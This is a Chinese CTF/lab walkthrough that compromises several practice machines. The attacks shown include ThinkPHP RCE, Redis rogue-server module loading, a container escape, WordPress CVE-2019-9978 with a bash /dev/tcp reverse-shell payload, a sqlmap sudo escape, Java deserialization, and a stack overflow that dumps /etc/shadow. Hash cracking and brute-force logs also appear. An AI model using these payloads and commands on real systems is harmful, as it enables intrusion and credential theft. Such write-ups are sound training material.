靶机扫描

┌──(root㉿kali)-[~]
└─# nmap -sS 192.168.1.39 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-12 01:46 EDT
Nmap scan report for 192.168.1.39
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:BD:44:E0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds

开了22 和 80

报错页面发现是ThinkPHP V5.0.5， 直接rce getshell

内网横向

fscan -h 172.19.0.0/24 -np
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0
                                                                                                                                                    
[2025-07-12 14:17:09] [INFO] 暴力破解线程数: 1                                                                                                      
[2025-07-12 14:17:09] [INFO] 开始信息扫描
[2025-07-12 14:17:09] [INFO] CIDR范围: 172.19.0.0-172.19.0.255
[2025-07-12 14:17:09] [INFO] 生成IP范围: 172.19.0.0.%!d(string=172.19.0.255) - %!s(MISSING).%!d(MISSING)
[2025-07-12 14:17:09] [INFO] 解析CIDR 172.19.0.0/24 -> IP范围 172.19.0.0-172.19.0.255
[2025-07-12 14:17:09] [INFO] 最终有效主机数量: 256
[2025-07-12 14:17:09] [INFO] 开始主机扫描
[2025-07-12 14:17:09] [INFO] 有效端口数量: 233
[2025-07-12 14:17:21] [SUCCESS] 端口开放 172.19.0.1:22
[2025-07-12 14:17:21] [SUCCESS] 服务识别 172.19.0.1:22 => [ssh] 版本:8.4p1 Debian 5+deb11u3 产品:OpenSSH 系统:Linux 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3.]                                                                                                                  
[2025-07-12 14:17:45] [SUCCESS] 端口开放 172.19.0.3:80
[2025-07-12 14:17:50] [SUCCESS] 服务识别 172.19.0.3:80 => [http] 版本:1.18.0 产品:nginx
[2025-07-12 14:29:31] [SUCCESS] 端口开放 172.19.0.2:6379
[2025-07-12 14:29:36] [SUCCESS] 服务识别 172.19.0.2:6379 => [redis] 版本:5.0.14 产品:Redis key-value store

fscan扫描内网 ,发现了172.19.0.2:6379跑了个redis

传个frp，开个socks代理，尝试连接redis

┌──(root㉿kali)-[~]
└─# proxychains4 -q redis-cli -h 172.19.0.2  -p 6379                                                                                 
172.19.0.2:6379> info
# Server
redis_version:5.0.14
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:82e99d45f54e2614
redis_mode:standalone
os:Linux 4.19.0-27-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:10.2.1
process_id:1
run_id:e88d7ed01f6f98ec6aacd23601cf3eb1ab6cc8df
tcp_port:6379
uptime_in_seconds:1231
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:7500446
executable:/data/redis-server
config_file:

# Clients
connected_clients:1
client_recent_max_input_buffer:4
client_recent_max_output_buffer:4100800
blocked_clients:0

# Memory
used_memory:854176
used_memory_human:834.16K
used_memory_rss:12750848
used_memory_rss_human:12.16M
used_memory_peak:4953952
used_memory_peak_human:4.72M
used_memory_peak_perc:17.24%
used_memory_overhead:840974
used_memory_startup:791280
used_memory_dataset:13202
used_memory_dataset_perc:20.99%
allocator_allocated:1424312
allocator_active:1716224
allocator_resident:8458240
total_system_memory:2092433408
total_system_memory_human:1.95G
used_memory_lua:37888
used_memory_lua_human:37.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.20
allocator_frag_bytes:291912
allocator_rss_ratio:4.93
allocator_rss_bytes:6742016
rss_overhead_ratio:1.51
rss_overhead_bytes:4292608
mem_fragmentation_ratio:15.70
mem_fragmentation_bytes:11938672
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.1.0
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1752329680
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:2
total_commands_processed:3
instantaneous_ops_per_sec:0
total_net_input_bytes:72
total_net_output_bytes:14801
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:20ebee4cf286daa409471774f86ee700d032f99f
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.697228
used_cpu_user:0.911468
used_cpu_sys_children:0.000000
used_cpu_user_children:0.001602

# Cluster
cluster_enabled:0

# Keyspace

redis未授权，尝试各种写马姿势弹shell都不行，和bamuwe交流得知 redis主机不出网

可以将攻击机的端口映射到内网，也可以将内网端口映射出来

web主机上有python3的环境，直接传一个简易的nc上去

import socket
import threading
import sys

def recv_thread(conn):
    try:
        while True:
            data = conn.recv(4096)
            if not data:
                print("\nConnection closed by client.")
                break
            print(data.decode(errors='ignore'), end='', flush=True)
    except Exception as e:
        print(f"\nReceive error: {e}")
    finally:
        conn.close()
        sys.exit(0)

def main():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <listen_port>")
        sys.exit(1)

    listen_port = int(sys.argv[1])

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(('0.0.0.0', listen_port))
    server.listen(1)
    print(f"Listening on 0.0.0.0:{listen_port} ...")

    conn, addr = server.accept()
    print(f"Connection from {addr[0]}:{addr[1]} established!")

    t = threading.Thread(target=recv_thread, args=(conn,), daemon=True)
    t.start()

    try:
        while True:
            cmd = sys.stdin.readline()
            if not cmd:
                break
            conn.sendall(cmd.encode())
    except KeyboardInterrupt:
        print("\nUser interrupted.")
    finally:
        conn.close()
        server.close()

if __name__ == "__main__":
    main()

https://github.com/n0b0dyCN/redis-rogue-server

使用这个工具直接一把梭

2025/07/12 10:59:33 CMD: UID=33    PID=760    | ./pspy64 
2025/07/12 10:59:33 CMD: UID=33    PID=704    | /bin/bash 
2025/07/12 10:59:33 CMD: UID=33    PID=703    | python3 -c import pty;pty.spawn('/bin/bash') 
2025/07/12 10:59:33 CMD: UID=33    PID=697    | sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=693    | sh -c uname -a; w; id; sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=692    | md5sum 
2025/07/12 10:59:33 CMD: UID=33    PID=472    | /bin/bash 
2025/07/12 10:59:33 CMD: UID=33    PID=471    | python3 -c import pty;pty.spawn('/bin/bash') 
2025/07/12 10:59:33 CMD: UID=33    PID=470    | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=469    | sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=465    | sh -c uname -a; w; id; sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=403    | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=32     | ./frpc -c frps.ini 
2025/07/12 10:59:33 CMD: UID=33    PID=30     | /bin/bash 
2025/07/12 10:59:33 CMD: UID=33    PID=29     | python3 -c import pty;pty.spawn('/bin/bash') 
2025/07/12 10:59:33 CMD: UID=33    PID=28     | sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=24     | sh -c uname -a; w; id; sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=15     | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=14     | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=9      | nginx: worker process          
2025/07/12 10:59:33 CMD: UID=0     PID=8      | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf) 
2025/07/12 10:59:33 CMD: UID=0     PID=7      | nginx: master process /usr/sbin/nginx -g daemon off; 
2025/07/12 10:59:33 CMD: UID=101   PID=6      | /usr/sbin/mariadbd 
2025/07/12 10:59:33 CMD: UID=0     PID=1      | /usr/bin/python3 /usr/bin/supervisord -c /etc/supervisord.conf 
2025/07/12 11:00:01 CMD: UID=0     PID=768    | runc init 
2025/07/12 11:00:01 CMD: UID=0     PID=773    | rm -fv /var/www/html/exp.so 

要注意服务器会定时删除so后缀的文件，将exp.so名称成一个没有后缀的文件就行

www-data@0bb9bcb43160:/tmp$ python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3
< python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 172.19.0.2:6379
[info] SERVER 172.19.0.3:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
r
[info] Open reverse shell...
Reverse server address: 172.19.0.3
172.19.0.3
Reverse server port: 5555
5555
[info] Reverse shell payload sent.
[info] Check at 172.19.0.3:5555
[info] Unload module...
   
$ python3 s.py
Usage: s.py <listen_port>
$ python3 s.py 5555
id
Listening on 0.0.0.0:5555 ...
Connection from 172.19.0.2:56334 established!
uid=999(redis) gid=999(redis) groups=999(redis)

成获取redis权限

cat /opt/user.txt
flag{user-4f6311d4cf5776f0316c2f1b6526a653}

提权

根据bamuwe的提示，查看web主机的数据库

www-data@0bb9bcb43160:/tmp$ mysql -uroot -proot
mysql -uroot -proot
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 7
Server version: 10.5.29-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;                                                                                                                                                
+--------------------+                                                                                                                                         
| Database           |                                                                                                                                         
+--------------------+                                                                                                                                         
| hnymwl_com_utf8    |                                                                                                                                         
| information_schema |                                                                                                                                                       
| mysql              |                                                                                                                                                       
| performance_schema |
+--------------------+
4 rows in set (0.000 sec)

MariaDB [(none)]> use hnymwl_com_utf8;
use hnymwl_com_utf8;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [hnymwl_com_utf8]> show tables;
show tables;
+---------------------------+
| Tables_in_hnymwl_com_utf8 |
+---------------------------+
| codepay_order             |
| codepay_user              |
| sdad3135                  |
| wp_allot                  |
| wp_area                   |
| wp_balance                |
| wp_bankcard               |
| wp_bankinfo               |
| wp_banks                  |
| wp_cardinfo               |
| wp_catproduct             |
| wp_conf                   |
| wp_config                 |
| wp_gg                     |
| wp_integral               |
| wp_klinedata              |
| wp_newsclass              |
| wp_newsinfo               |
| wp_opentime               |
| wp_order                  |
| wp_order_log              |
| wp_payment                |
| wp_price_log              |
| wp_productclass           |
| wp_productdata            |
| wp_productinfo            |
| wp_refundlog              |
| wp_risk                   |
| wp_usercode               |
| wp_userinfo               |
| wp_webconfig              |
| wp_wechat                 |
+---------------------------+
32 rows in set (0.001 sec)

MariaDB [hnymwl_com_utf8]> select * from wp_userinfo;
select * from wp_userinfo;
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
| uid  | username    | upwd                             | utel        | utime      | agenttype | otype | ustatus | oid     | address | portrait | lastlog    | managername | comname | comqua | rebate | feerebate | usertype | wxtype | openid | nickname  | logintime  | usermoney | userpoint | minprice |
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
|    1 | admin       | 35a6b91de813873ca887f5d9b681d180 |             | 1480061674 |         2 |     3 |       0 | NULL    | NULL    | NULL     |       NULL | NULL        | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | admin     | NULL       |      0.00 |      NULL |     NULL |
| 5632 | 10005632    | 18aed8d2a11896a6e76180b3d87e64bb | 123456      | 1592404993 |         0 |     0 |       0 | 1       | NULL    | NULL     | 1597391565 | admin       | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | www       | 1597391565 |  11670.00 |      NULL |     NULL |
| 5634 | 18888888888 | cf9c0c4996398526203b25d179b60aad | 18888888888 | 1592469112 |         0 |     0 |       0 | 666     | NULL    | NULL     | 1751965186 | AN          | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | 小可爱    | 1751965186 | 680278.00 |      NULL |     NULL |
| 5635 | 10005635    | f9fb7dcf1f8af5b50235be3cbccf90ee | 19216813711 | 1752205841 |         0 |     0 |       0 | dashazi | NULL    | NULL     | 1752205841 | whatcanisay | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | root      | 1752205841 |      0.00 |      NULL |     NULL |
| 5636 | 10005636    | cafc17ccad5b7523338f81ab912c2750 | 13333333333 | 1752296822 |         0 |     0 |       0 | 1       | NULL    | NULL     | 1752296822 | NULL        | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | test      | 1752296822 |      0.00 |      NULL |     NULL |
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
5 rows in set (0.000 sec)

MariaDB [hnymwl_com_utf8]> 

在wp_userinfo表中发现了一个root的密码，将web代码脱下来审计，查看密码加密方式

public function login()
    {
        $userinfo = Db::name('userinfo');
        //判断是否已经登录
        if (isset($_SESSION['uid'])) {
            $this->redirect('index/index?token='.$this->token);
        }
        
        if(iswechat() && 1==2){
            //微信浏览器 微信登录
            if(cookie('wx_info')){
                $wx_info = cookie('wx_info');

                $data['openid'] = $wx_info['openid'];
                $checkuser = Db::name('userinfo')->where($data)->value('uid');
                //判断是否已经注册
                if($checkuser){  //已经注册直接記錄session
                    $_SESSION['uid'] = $checkuser;
                    //更新登录时间
                    $t_data['logintime'] = $t_data['lastlog'] = time();
                    $t_data['uid'] = $checkuser;
                    $userinfo->update($t_data);
                    $this->redirect('index/index');
                }else{  //未注册 则注册 默认密碼为123456
                    $data['nickname'] = $wx_info['nickname'];
                    $data['utime'] = time();
                    //$data['upwd'] = md5('123456'.$data['utime']);
                    $data['otype'] = 0;
                    $data['ustatus'] = 0;
                    $data['address'] = $wx_info['country'].$wx_info['province'].$wx_info['city'];
                    $data['portrait'] = $wx_info['headimgurl'];
                    if(isset($_SESSION['fid']) && $_SESSION['fid']>0){
                        $fid = $_SESSION['fid'];
                        $fid_info = $userinfo->where(array('uid'=>$fid,'otype'=>101))->value('uid');
                        if($fid_info){
                            $data['oid'] = $fid;
                        }

                    }
                    //插入数据
                    $ids = $userinfo->insertGetId($data);
                    $newdata['uid'] = $ids;
                    $newdata['username'] = 10000000+$ids;
                    $newids = $userinfo->update($newdata);
                    //清除cookie 为了安全
                    cookie('wx_info', null);
                    //記錄session
                    $_SESSION['uid'] = $ids;
                    //更新登录时间
                    $t_data['logintime'] = $t_data['lastlog'] = time();
                    $t_data['uid'] = $ids;
                    $userinfo->update($t_data);
                    $this->redirect('login/addpwd?token='.$this->token);
                }
            }else{
                $this->redirect('wechat/get_wx_userinfo');
                
            }

        }else{
            //web用戶登录请求
            if(input('post.')){
                $data = input('post.');
                //验证用戶信息
                if(!isset($data['username']) || empty($data['username'])){
                    return WPreturn('请输入用戶名！',-1);
                }
                if(!isset($data['upwd']) || empty($data['upwd'])){
                    return WPreturn('请输入密碼！',-1);
                }
                //查询用戶
                
                $result = $userinfo
                ->where('username',$data['username'])->whereOr('nickname',$data['username'])->whereOr('utel',$data['username'])
                        ->field("uid,upwd,username,utel,utime,otype,ustatus")->find();
                //验证用戶
                if(empty($result)){
                    return WPreturn('登录失败,用戶名不存在!',-1);
                }else{
                    if(!in_array($result['otype'], array(0,101))){  //非客户无权登录
                        return WPreturn('您无权登录!',-1);
                    }
                    if($result['upwd'] == md5($data['upwd'].$result['utime'])){
                    
                        if ($result['ustatus']==0)
                        {
                            $_SESSION['uid'] = $result['uid'];
                            //更新登录时间
                            $t_data['logintime'] = $t_data['lastlog'] = time();
                            $t_data['uid'] = $result['uid'];
                            $userinfo->update($t_data);
                            return WPreturn('登录成功!',1);

                        }elseif($result['ustatus']==1){
                            return WPreturn('登录失败,您的账户暂时被冻结!',-1);
                        }else{
                            return WPreturn('登录失败,用戶名不存在!',-1);
                        }
                    
                    }
                    else{
                        return WPreturn('登录失败,密碼错误!',-1);
                    }
                }

                
                
            }
            return $this->fetch();
            
        }

加密密码是 md5(pass+时间戳)

可以写脚本爆破，也可以不写，群里直接提示了 密码是managername字段下的whatcanisay

登录到redis主机的root

cat /proc/self/status |grep Cap
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

猜测这应该是个特权容器

ls /dev/ | grep sda
sda
sda1
sda2
sda5
mount /dev/sda1 /mnt
cd /mnt
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd root 
ls
root.txt
cat root.txt
flag{root-6dbfaf239023f6da6ed2ffc59d3bcea5}

将sda1挂载上，发现这就是主机的目录，成功逃逸

发现是wordpress 随便点几下跳转了http://new.dsz 改个hosts

wordpress的话就走正常流程，wpscan扫用户爆破密码先整上，发现没什么成果

发现用了Social Warfare v3.5.2插件，随便一搜就找到rce https://github.com/hash3liZer/CVE-2019-9978

┌──(root㉿kali)-[~]
└─# cat payload                    
<pre>system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.37/4444 0>&1'")</pre>
                                                                                                              ┌──(root㉿kali)-[~]
└─# python2 wp.py -t http://new.dsz --payload-uri http://192.168.1.37/payload
[>] Sending Payload to System!
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.1.37] from (UNKNOWN) [192.168.1.36] 33860
bash: cannot set terminal process group (430): Inappropriate ioctl for device
bash: no job control in this shell
www-data@New:/var/www/new.dsz/wp-admin$ 

成功getshell

提权

www-data@New:/home$ cd /opt
cd /opt
www-data@New:/opt$ ls
ls
andeli_cred
www-data@New:/opt$ 

在opt下有个andeli_cred可执行文件，执行输出一堆类似md5的值，尝试用这些字符串去爆破andeli用户

┌──(root㉿kali)-[~]
└─# hydra -l andeli -P 1  ssh://192.168.1.36 -vV -f -t 10 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-01 20:26:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10001 login tries (l:1/p:10001), ~1001 tries per task
[DATA] attacking ssh://192.168.1.36:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://andeli@192.168.1.36:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.36:22
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "固定MD5插入位置: 665" - 1 of 10001 [child 0] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "eea0353df30b9b38f5f280db88912f91" - 2 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "e31195e88f31a699c9c499f129248b56" - 3 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "f788c604535faf9685a1ea30355b1a20" - 4 of 10001 [child 3] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1a8d0816b7556ebe36f2022387e92093" - 5 of 10001 [child 4] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "a11b921496af55d8bdabfde74d06d9a8" - 6 of 10001 [child 5] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "ab33d487a26f748312e0fd84a8a724fc" - 7 of 10001 [child 6] (0/0)
............................
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5cca227ce87f76ad1728abcfbb0dd792" - 658 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "35d57416c953f0007381e409006d700a" - 659 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5dfd113da80981a0421272c7224a2448" - 660 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "145258ff008912955a7cc33f6798cd0d" - 661 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1506df5efe700055ad170466cff8cf5e" - 662 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "55425a0487587ae27f984fe0ed8add82" - 663 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "3d4875cfc174c5635fb9ea9c7164ef61" - 664 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "cb93062c7903f67452d3c6f476855f71" - 665 of 10001 [child 7] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "9eeb22195b4eb7a35bcad0f45761eb7b" - 666 of 10001 [child 9] (0/0)
[22][ssh] host: 192.168.1.36   login: andeli   password: 9eeb22195b4eb7a35bcad0f45761eb7b

登录ssh，三板斧，找一下suid，没发现可利用的

看一下sudo -l

andeli@New:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
andeli@New:~$ sudo -l
Matching Defaults entries for andeli on New:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User andeli may run the following commands on New:
    (ALL) NOPASSWD: /usr/bin/sqlmap

可以用root执行sqlmap

andeli@New:~$ sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
        ___
       __H__                                                                                                                              
 ___ ___[)]_____ ___ ___  {1.5.2#stable}                                                                                                  
|_ -| . ["]     | .'| . |                                                                                                                 
|___|_  [,]_|_|_|__,|  _|                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:43:51 /2025-07-01/

[20:43:51] [INFO] testing connection to the target URL
# id
uid=0(root) gid=0(root) groups=0(root)
# 

模拟终端执行

查看/opt/code/test.c 文件

伪随机，跑代码得到三个数

用这三个数进行端口敲门，就会开放8080端口

访问8080， 密码爆破 admin/123457

目录扫描，发现接口/download

对参数进行爆破，爆破出参数为file，可以任意文件读取

读取/proc/self/maps 查看内存

找到/app/javaserver-0.0.1-SNAPSHOT.jar

使用这个接口读取jar

反编译发现反序列化接口

直接打CommonsCollections链子

使用ysoserial生成反弹shell payload

带上cookie发送payload getshell

内网横向

上传frp 搭建socks代理

使用fscan 等工具扫描内网主机

扫描到内网主机172.17.0.2，开起来80和22

查看80端口，是一个关于暴力破解的讲解，在最底下有一个注释内容500-worst-passwords

这是seclists中的一个字典，使用这个字典去爆破root@172.17.0.2 root/mountain

ssh连上去 在/usr/bin中发现可疑文件 userLogin

ida分析

标准的xtea加密

找到key和输出的文件

因为是常量定义的key 和 读取的文件的文件名，这里ida分析将这两值合在了一起

xtea的key为16位，分成4组进行加密

key-for-user-ldz是key ， id_ed25519是读取的文件名

很明显是一个私钥，写脚本解密output.enc

提取出来解密

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define BLOCK_SIZE 8
#define ROUNDS 64

const char FIXED_KEY_STR[16] = "key-for-user-ldz"; 
const char *INPUT_FILE = "output.enc";          
const char *OUTPUT_FILE = "decrypted.txt";     

void xtea_decrypt(uint32_t v[2], const uint32_t key[4]) {
    uint32_t v0 = v[0], v1 = v[1];
    uint32_t delta = 0x9E3779B9, sum = delta * ROUNDS;
    for (int i = 0; i < ROUNDS; ++i) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    v[0] = v0; v[1] = v1;
}

void key_from_fixed_string(uint32_t key[4]) {
    for (int i = 0; i < 4; ++i) {
        key[i] = ((uint32_t)FIXED_KEY_STR[i*4]) |
                 ((uint32_t)FIXED_KEY_STR[i*4 + 1] << 8) |
                 ((uint32_t)FIXED_KEY_STR[i*4 + 2] << 16) |
                 ((uint32_t)FIXED_KEY_STR[i*4 + 3] << 24);
    }
}

void decrypt_file() {
    FILE *fin = fopen(INPUT_FILE, "rb");
    FILE *fout = fopen(OUTPUT_FILE, "wb");
    if (!fin || !fout) {
        perror("文件打开失败");
        exit(1);
    }

    uint32_t key[4];
    key_from_fixed_string(key);

    uint8_t buffer[BLOCK_SIZE];
    size_t read_size;
    while ((read_size = fread(buffer, 1, BLOCK_SIZE, fin)) == BLOCK_SIZE) {
        uint32_t block[2];
        memcpy(block, buffer, BLOCK_SIZE);
        xtea_decrypt(block, key);
        fwrite(block, 1, BLOCK_SIZE, fout);
    }

    fclose(fin);
    fclose(fout);
    printf("解密完成：%s → %s\n", INPUT_FILE, OUTPUT_FILE);
}

int main() {
    decrypt_file();
    return 0;
}

查看解密完的文件

是个私钥，设置权限600 ，根据解密的key，可以得知是用户ldz的私钥

登录这个用户

提权

localhost:~$ find / -perm -4000 2>/dev/null
/opt/vuln
/bin/bbsuid

查看suid

有个vuln，ida分析一下

让flag=1就能执行secret()函数

这个函数读取/etc/shadow

这里很明显是一个栈溢出覆盖flag的值，进行判断绕过

payload:

localhost:~$ python -c "print('A'*44 + '\x01\x00\x00\x00')" | /opt/vuln
root:$6$W5FUwrTeo8vXfNot$qJazigaYSqk8ezVfjHckZb2XjxkrJsniQa5MA1o.j9apE1BMYX5vYuJVEJ2hYbNsR0q9IWOSSt1I40vNYxvKO0:20263:0:::::
bin:!::0:::::
daemon:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
games:!::0:::::
ntp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
klogd:!:20205:0:99999:7:::
chrony:!:20205:0:99999:7:::
ldz:$6$qCU7eP8wj/Pvo1FB$Ooou6p.TF3M/kMB29XrzQ6XVNbq7c46lGzNvRPOJ55GAXJ0h.jmbc8VHhGjFgwXLHPSbNt96l/rmUYgDqpo8Y0:20263:0:99999:7:::
nginx:!:20263:0:99999:7:::

成功读取shadow

爆破得到root密码

┌──(root㉿kali)-[~]
└─# john --format=sha512crypt --wordlist=rockyou.txt hash       
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
No password hashes left to crack (see FAQ)
                                                                                                                                               
┌──(root㉿kali)-[~]
└─# john hash --show                                     
root:yulianateamo:20263:0:::::

1 password hash cracked, 0 left


┌──(root㉿kali)-[~]
└─# ssh root@10.20.73.10                
root@10.20.73.10's password: 

localhost:~# 
localhost:~# 
localhost:~# ls
root.txt
localhost:~# cat root.txt 
flag{98ecb90d5dcef41e1bd18f47697f287a}
localhost:~# 

nmap扫端口

nmap -sS 10.20.73.121 -T4

